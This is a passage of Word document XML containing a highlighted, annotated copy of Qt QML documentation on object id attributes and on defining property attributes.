      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must begin with a lower-case letter</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or an </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>underscore</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot contain characters other than letters, numbers and underscores</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Below</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2711" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object and a</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2712" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2713" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object's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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value is set to "myTextInput". The</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2714" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object sets its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text</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to have the same value as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text</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2715" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextInput</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, by referring to</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myTextInput.text</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Now, both items will display the same text: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Column</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TextInput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id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myTextInput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"Hello World"</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Text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myTextInput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text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An object can be referred to by its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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from anywhere within the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>component scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in which it is declared. Therefore, an</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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value must always be unique within its component scope. See</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2716" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scope and Naming Resolution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</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A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once an object instance is created, the value of its</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attribute cannot be changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. While it may look like an ordinary property,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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attribute is</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an ordinary</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">special </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>semantics apply to it</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; for example, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not possible to access</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>myTextInput.id</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the above example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2453" w:name="property-attributes"/>
      <w:bookmarkStart w:id="2454" w:name="_Toc483001063"/>
      <w:bookmarkStart w:id="2455" w:name="_Toc483004052"/>
      <w:bookmarkStart w:id="2456" w:name="_Toc483604398"/>
      <w:bookmarkStart w:id="2457" w:name="_Toc483605618"/>
      <w:bookmarkEnd w:id="2453"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2454"/>
      <w:bookmarkEnd w:id="2455"/>
      <w:bookmarkEnd w:id="2456"/>
      <w:bookmarkEnd w:id="2457"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an attribute of an object that </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be assigned a static value or bound to a dynamic expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A property's value </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be read by other objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Generally it can also be </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0333A">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modified by another object</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, unless a particular QML type has explicitly disallowed this for a specific property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2458" w:name="defining-property-attributes"/>
      <w:bookmarkStart w:id="2459" w:name="_Toc483001064"/>
      <w:bookmarkStart w:id="2460" w:name="_Toc483604399"/>
      <w:bookmarkStart w:id="2461" w:name="_Toc483605619"/>
      <w:bookmarkEnd w:id="2458"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining Property Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2459"/>
      <w:bookmarkEnd w:id="2460"/>
      <w:bookmarkEnd w:id="2461"/>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 property may be defined for a type </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registering a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2717" w:anchor="Q_PROPERTY" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_PROPERTY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of a class which is then registered with the QML type system. Alternatively, a custom property of an object type may be defined in an </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object declaration in a QML document</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default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&lt;propertyType&gt;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&lt;propertyName&gt;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In this way an object declaration </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2718" w:anchor="defining-object-types-from-qml" w:history="1">
        <w:r w:rsidRPr="00C371C5">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>expose a particular value</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to outside objects or maintain some internal state more easily</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // purpose of properties //</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C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property names must begin with a lower case letter and can only contain letters, numbers and underscores</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
